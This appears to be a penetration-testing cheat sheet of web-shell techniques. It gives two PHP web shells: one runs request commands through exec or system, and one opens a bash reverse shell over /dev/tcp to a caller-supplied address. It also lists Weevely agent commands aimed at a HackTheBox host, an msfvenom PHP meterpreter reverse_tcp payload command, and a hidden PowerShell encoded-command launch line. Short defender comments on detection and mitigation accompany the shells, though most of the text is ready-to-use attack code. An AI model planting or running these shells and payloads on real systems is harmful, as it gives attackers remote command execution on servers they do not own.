PHP
<?php
// Web shell sample: request parameters are passed straight to exec() with no
// authentication check, validation or escaping visible in this file.
// Reviewer/defender notes:
//  - $_REQUEST merges GET and POST input (and cookies, depending on the
//    request_order setting), so the parameters need not appear in the URL
//    that an access log records.
//  - Observable behaviour: the PHP process spawning /bin/bash, and an outbound
//    TCP connection from the web host to the requested address.
//  - Mitigations: listing exec/system in php.ini disable_functions, and not
//    letting the web server execute scripts from upload directories.

// Destination port comes from the 'port' request parameter; '1234' if absent.
$port = (isset($_REQUEST['port'])) ? $_REQUEST['port'] : '1234' ;
if(isset($_REQUEST['ip'])) {
// Starts an interactive bash whose stdin/stdout/stderr are redirected to
// /dev/tcp/<ip>/<port>; both values are concatenated into the shell string as-is.
exec("/bin/bash -c 'bash -i >& /dev/tcp/". $_REQUEST['ip'] ."/". $port . " 0>&1'");
} elseif(isset($_REQUEST['cmd'])) {
// Runs the 'cmd' parameter as a shell command; exec() returns only the last
// line of output, and that line is echoed into the response.
echo exec($_REQUEST['cmd']);
}
?>
<?php
// Minimal web shell sample: the 'cmd' GET parameter is handed to system()
// unchanged, with no authentication check or escaping visible in this file.
// Reviewer/defender notes:
//  - Input is read from $_GET only, so the command travels in the query string,
//    which web servers typically write to their access logs.
//  - Observable behaviour: the PHP process spawning a shell child process.
//  - Mitigations: listing system/exec in php.ini disable_functions, and not
//    letting the web server execute scripts from upload directories.
if(isset($_GET['cmd']))
{
echo system($_GET['cmd']);
}
?>
Weevely
- Generate an agent
/usr/share/weevely/weevely.py generate 123 reverse.php
- Upload agent file on the server
- Connect to the agent
/usr/share/weevely/weevely.py http://thetoppers.htb/reverse.php 123
Msfvenom
# Create a Metasploit payload (e.g. PHP).
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD==